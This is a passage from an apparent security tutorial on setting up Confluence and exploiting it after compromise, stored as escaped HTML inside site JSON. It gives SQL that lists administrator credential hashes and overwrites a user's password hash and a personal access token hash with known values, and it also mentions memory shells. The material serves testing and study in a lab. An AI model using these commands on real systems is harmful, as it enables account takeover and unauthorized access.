src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017516981_8_9bcbbba4ab-1.jpeg\">\u003C\u002Fp>\u003Cp>Next, set up the content, manage users, and administrator account pages in sequence\u003C\u002Fp>\u003Cp>The final success page is shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017521255_9_24156fed9b-1.jpeg\">\u003C\u002Fp>\u003Cp>Access the login page: http:\u002F\u002Flocalhost:8090\u002Fwelcome.action, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017524493_10_7f30ee92e9-1.jpeg\">\u003C\u002Fp>\u003Ch3>3. Create a Confluence regular user\u003C\u002Fh3>\u003Cp>After logging in with the administrator account, select User management for user configuration, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017526856_11_4cebcb89f6-1.jpeg\">\u003C\u002Fp>\u003Cp>Add user test1 and configure as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017528245_12_0f840da2ed-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Administrator accounts correspond to the following two groups:\u003C\u002Fp>\u003Cul>\u003Cli>confluence-administrators\u003C\u002Fli>\u003Cli>confluence-users\u003C\u002Fli>\u003C\u002Ful>\u003Cp>After adding users, you can access http:\u002F\u002Flocalhost:8090\u002F to log in\u003C\u002Fp>\u003Ch2>0x03 Basic Knowledge\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. File Directory\u003C\u002Fh3>\u003Cp>Reference materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.cwiki.us\u002Fdisplay\u002FCONF6ZH\u002FConfluence+Home+and+other+important+directories\u003C\u002Fp>\u003Ch4>(1) \u003Cconfluence-installation>\u003C\u002Fconfluence-installation>\u003C\u002Fh4>\u003Cp>Installation directory, used to store system files\u003C\u002Fp>\u003Cp>Default installation location:\u003C\u002Fp>\u003Cul>\u003Cli>Windows: C:\u002FProgram Files\u002FAtlassian\u002FConfluence\u002F\u003C\u002Fli>\u003Cli>Linux: \u002Fopt\u002Fatlassian\u002Fconfluence\u002F\u003C\u002Fli>\u003C\u002Ful>\u003Ch4>(2) \u003Cconfluence-home>\u003C\u002Fconfluence-home>\u003C\u002Fh4>\u003Cp>Data directory, used for storing data\u003C\u002Fp>\u003Cp>Default installation location:\u003C\u002Fp>\u003Cul>\u003Cli>Windows: C:\u002FProgram Files\u002FAtlassian\u002FApplication Data\u002FConfluence\u002F\u003C\u002Fli>\u003Cli>Linux: \u002Fvar\u002Fatlassian\u002Fapplication-data\u002Fconfluence\u002F\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Connection between the two:\u003C\u002Fp>\u003Cp>The location of \u003Cconfluence-home> is defined in the \u003Cconfluence-installation>\u002Fconfluence\u002FWEB-INF\u002Fclasses\u002Fconfluence-init.properties file\u003C\u002Fconfluence-installation>\u003C\u002Fconfluence-home>\u003C\u002Fp>\u003Ch3>2. Database information\u003C\u002Fh3>\u003Cp>Location storing database configuration information: \u003Cconfluence-home>\u002Fconfluence.cfg.xml\u003C\u002Fconfluence-home>\u003C\u002Fp>\u003Ch3>3. User information\u003C\u002Fh3>\u003Cp>User information is located in the Confluence database\u003C\u002Fp>\u003Cp>Table storing user information: CWD_USER, specific column names are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>user_name: Username\u003C\u002Fli>\u003Cli>active: Whether enabled\u003C\u002Fli>\u003Cli>email_address: Email address\u003C\u002Fli>\u003Cli>credential: User credentials\u003C\u002Fli>\u003Cli>directory_id: User group, representing user permissions\u003C\u002Fli>\u003C\u002Ful>\u003Cp>The specific user group name corresponding to directory_id can be viewed in the following ways:\u003C\u002Fp>\u003Cul>\u003Cli>Query the group_name column in the cwd_group table; the value for the administrator user group is confluence-administrators\u003C\u002Fli>\u003Cli>Query the directory_name column in the cwd_directory table; the value for the administrator user group is Confluence Internal Directory\u003C\u002Fli>\u003C\u002Ful>\u003Cp>SQL command to directly filter out administrator users:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>confluence=&gt; select u.id,u.user_name,u.active,u.credential from cwd_user u  join cwd_membership m on u.id=m.child_user_id join cwd_group g on m.parent_id=g.id join cwd_directory d on d.id=g.directory_id where g.group_name = 'confluence-administrators' and d.directory_name='Confluence Internal Directory';\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The execution result is shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017530263_13_ae2c5943e3-1.jpeg\">\u003C\u002Fp>\u003Ch3>4. Log file location\u003C\u002Fh3>\u003Cp>\u003Cconfluence-home>\u002Flogs\u002F\u003C\u002Fconfluence-home>\u003C\u002Fp>\u003Ch3>5. Web path\u003C\u002Fh3>\u003Cp>\u003Cconfluence-installation>\u002Fconfluence\u002F\u003C\u002Fconfluence-installation>\u003C\u002Fp>\u003Cp>Windows: Confluence default permission is network service, which has write permission\u003C\u002Fp>\u003Cp>Linux: Confluence default permission is confluence, which does not have write permission\u003C\u002Fp>\u003Ch2>0x04 Exploitation approach\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Modify the database to implement user login\u003C\u002Fh3>\u003Ch4>(1) Modify user login credentials\u003C\u002Fh4>\u003Cp>Usage example:\u003C\u002Fp>\u003Cp>View key user information with the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>confluence=&gt; select id,user_name,credential from cwd_user;\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Execution result as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017531308_14_497ccfd2b2-1.jpeg\">\u003C\u002Fp>\u003Cp>Modify the credentials for user test2 with the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>confluence=&gt; UPDATE cwd_user SET credential= '{PKCS5S2}UokaJs5wj02LBUJABpGmkxvCX0q+IbTdaUfxy1M9tVOeI38j95MRrVxWjNCu6gsm' WHERE id = 458755;\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Confirm the database has been modified, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017532196_15_3e0576ee7d-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>{PKCS5S2}UokaJs5wj02LBUJABpGmkxvCX0q+IbTdaUfxy1M9tVOeI38j95MRrVxWjNCu6gsm corresponds to the plaintext password 123456\u003C\u002Fp>\u003Ch4>(2) Modify Personal Access Tokens\u003C\u002Fh4>\u003Cp>Personal Access Tokens enable passwordless login.\u003C\u002Fp>\u003Cp>Reference materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fconfluence.atlassian.com\u002Fbitbucketserver0610\u002Fpersonal-access-tokens-989761177.html\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdeveloper.atlassian.com\u002Fserver\u002Fconfluence\u002Fconfluence-server-rest-api\u002F\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.atlassian.com\u002FConfluenceServer\u002Frest\u002F7.11.6\u002F\u003C\u002Fp>\u003Cp>Usage example:\u003C\u002Fp>\u003Cp>In the test environment, the Personal Access Tokens table is AO_81F455_PERSONAL_TOKEN.\u003C\u002Fp>\u003Cp>Query statement:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>confluence=&gt; select * from \"AO_81F455_PERSONAL_TOKEN\";\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>To modify Personal Access Tokens, use the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>confluence=&gt; UPDATE \"AO_81F455_PERSONAL_TOKEN\" SET \"HASHED_TOKEN\"= '{PKCS5S2}Deoq\u002FpsifhVO0VE8qhJ6prfgOltOdJkeRH4cIxac9NtoXVodRQJciR95GW37gR7\u002F' WHERE \"ID\" = 4;\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>{PKCS5S2}Deoq\u002FpsifhVO0VE8qhJ6prfgOltOdJkeRH4cIxac9NtoXVodRQJciR95GW37gR7\u002F corresponds to the token MjE0NTg4NjQ3MTk2OrQ5JtSJgT\u002FrrRBmCY4zu+N+NaWZ\u003C\u002Fp>\u003Ch3>2. Write file\u003C\u002Fh3>\u003Cp>Web path: \u003Cconfluence-installation>\u002Fconfluence\u002F\u003C\u002Fconfluence-installation>\u003C\u002Fp>\u003Cp>Windows: Confluence default permissions are network service, with write access.\u003C\u002Fp>\u003Cp>Linux: Confluence default permissions are confluence, without write access, but memory shell can be attempted.\u003C\u002Fp>\u003Ch2>0x05 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the fundamental knowledge related to the exploitation of Confluence.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",1246,"Onedaysec",4,"published","2026-02-02T07:51:00.264Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Confluence Setup Guide: Install & Configure on CentOS 7","Confluence setup, CentOS 7, PostgreSQL, CVE-2021-26084, enterprise wiki, installation guide",null,false,[],{"docs":43,"hasNextPage":40},[44,4,45,46],406,404,403,{"title":39,"description":39,"image":39},"2026-07-24T15:37:13.613Z","2026-07-23T16:01:30.612Z","draft","2026-07-23T16:05:59.242Z"]